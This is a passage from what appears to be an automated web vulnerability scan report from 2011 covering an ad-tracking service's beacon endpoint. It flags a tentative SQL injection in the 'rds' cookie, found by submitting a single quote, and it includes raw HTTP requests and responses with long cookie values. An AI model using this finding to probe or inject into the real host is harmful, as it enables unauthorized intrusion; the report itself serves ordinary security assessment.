pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr36hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:45 GMT; Path=/
Set-Cookie: pf=mFocgDDVh_dZydU1g12Ehh6Y3Wu2IxLshYd4Gr5JzbUStJHO4dSC7tcSjJ5dCIRNZDpM35cC-2bkiEEmtUQheJ_NWdUdORgFPGcP8J5KKX8dRoGs9UmTmTpFJBUogllMq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdNChmr2gqp_bsTKTrtZC7Y3cLD_SNDEbV8PMUFlmzT1Mpob_IshpEh44rjpUDRjqJJMVdwgJWqAHsrcU4vJzg1SjgTP9Ov4STqlXA29oMDzPfGyNLa-_wPmqx3yJUi2IqTlK6CdjWFW1KEX54kS_ltaLuvYLqy9AK1C3yejAK-xaykGJBATBiEB1A-mpjZRk1XO1GIUSXwpOmQA3cP0_GhDVw3tWIfXcXZPtmgpedERpR0OX7qHfFd3oEUI9TNhW36tgQNKsLUM6bH-Qya0rPKK3xE-wlW2DrQ8fYSs4TMEvyXks2CaOh8vogKgNrPYlGwiZ_70V-oeSP1dKu4cHLUWD8rRKpGQ5zUHIYwzHzR6QREtI2WNZ3Adox509mnGLBVjGevByqOHOsjKmlXbNODb6Y3H0CFlXDib_ILYDFD17K7G44mhJBfz-2iD8xpXbSXbBUpi4HxPSR67PW5XhyLHH1mqciITfCStXnyfp8nZIZQqaG4OBR9yFGgc-bt9nO5d_CDt-B6Iy4h60FUu_tgFH1UTi_ILqaqJbnKQc4dyQs9BG1XC1ekAueszKb7ATwt9ZWKbAjd_kWK3de6VFeM1_J8r6Mg839cdE-vqqliNDWgmlxMMtirW_wsRgboCN9-DxpMh0jR_5_keLnZw8XmwZiK5dn6LSGDBJSWCOZwcce6h6IRMXz1J_JELzaH_onOQLgZCEZBHmd0C39_Q-UJpzDJrWrf7FSWkmNoG270CuSXAVLACWiBvhO9FgGk4kJFqcjBWiCcZZpfUD2jEwpuyqm_ODS8CSL9M7Tu29jFKorn4aMWnUPt3XMXb4_YieYwBRFKaHWkr9RVIe5oyIapyZAhteT3kqjwgRQ2YX3O8KsvOWIBxv9BM8UsE1JMAin_wmFeY6KLb2Pbbu5y41BdYrJVsIqdUFJ32THdSVwW1Nf_ZhcI44X56y0kvpbYT_-FtS_31ORFew1FDHGBZb20VtyT1N5IDiua2Nvb02hfPArk8TKrHYY6jGNbgkfED4z9FzVMcyTIS3tsMyTKoEx8ecZHITBJx-_JL8gDfIJWTwYBIOsWGxhhh6a6x1JpG0XoBvuHFbTm5_31c0udk6gRvPijDFIQgImy8IDAqCl_FHgpk9L6bHlXrOGOkA8xLvom2l67Jp--o1GJOVeVXbV8hKxmNte69mTdtIbIi7pu5G03zEhXjDyXazRh9NTdlnzSkK4s_T8x92kKTR8j6AZOOv8WvAQtNw34E0JxRX3YS_PDldeKWqwmlRyrFrnZD-Y7vBkk1SG4Sb-cUCYUtCQcZLmCcMefs5VEvIewIXC8hDpQpYfpt6ziGAaOZsgnnnoYIZFYyd8Lm2F4igryWobdd5YrkRpeELltDs2XsrfndTwBRPEg66bRJrGvCMQM1yfxVvTJlqdQexwgA8z9IUVfhD4jtueYUx8YEI3gT_T7D2euQfvd16LSPV0o72hJyb8BGXZC7DPfL33e3pPbLKLMdNj9dInrzxrOFVZrVcpOf_BYQyMx1Y91fTsZYMRAuMLZZQEp10RuJnKJnmFBQhTFAsbsucXnjgUH5VeR36WC3FK3fum-jCHBtDjw-pnaVVlC4sQ68W3urWfmZtvCZr1h_OnZSSibkOhtDehoU54OCoubkDcteRmScy9HXzIp4QwVGghfRBa7pc3fuF4rQy1wwmpThEzPKMNPx_J6QrodQCsc0eNM_s9iTxSRkyKOcbia0331t5xReH2aJblLi51CalhYKO9KRIQnN9rPf8dCqoPeBL41X_s--UtQ_z-u125wnCAr3fKblGSrypJUEplbysAYMQ4OCW-R8vTcHjkHx_UBqvys6lUjUhj2RQMg7x2c1GOdbDXBvMQBpFrkUvn-qmWifwDWG5XexpRYTGVVPVPzkEhhfH-ahPVx3KGAxc-VwXA0X7F0Th8eVYQBIp0gbgZhP7EdeuIM1d7srFUNkHUR5CX4pixUu1jhEBuqb8ElJhpT-6ZRlRxL_mcahGSK3Fxc5-fVbnDjJNY2qEteJPHPJixHAREzZ8szLJ3nhdbMmBQq3HaNAgIOeZh6qyK1lmkJpCkhXCXD4KAih9LCcayMz80KUjcfwiLHdZH1w8owNiwxbyob2dUBCBJu3YeND2YzUGfR3fDDZtyV_v0vTVnvFhyuDUrxEt2fUBhobuQ478qfmDJT5jYS0w6IyJYYwI4UvXls47FLMPUqCrSqQvH_9kVgszlBsZP1s9a32Ylm8Wya01H_mlc8V164jSCjXQFLLxo6OHWI0cNICPiEQmczBLpFVz2ysE_4RUaQP7A8vUHi-1aYE-LQSJ4HNPFrPBSZbStxPDoD7ScuxKM9Ag4AYOxKVZlEb42cv4UOl9h; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:45 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:45 GMT

1.12. http://r.turn.com/r/beacon [rds cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The rds cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rds cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr36hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; 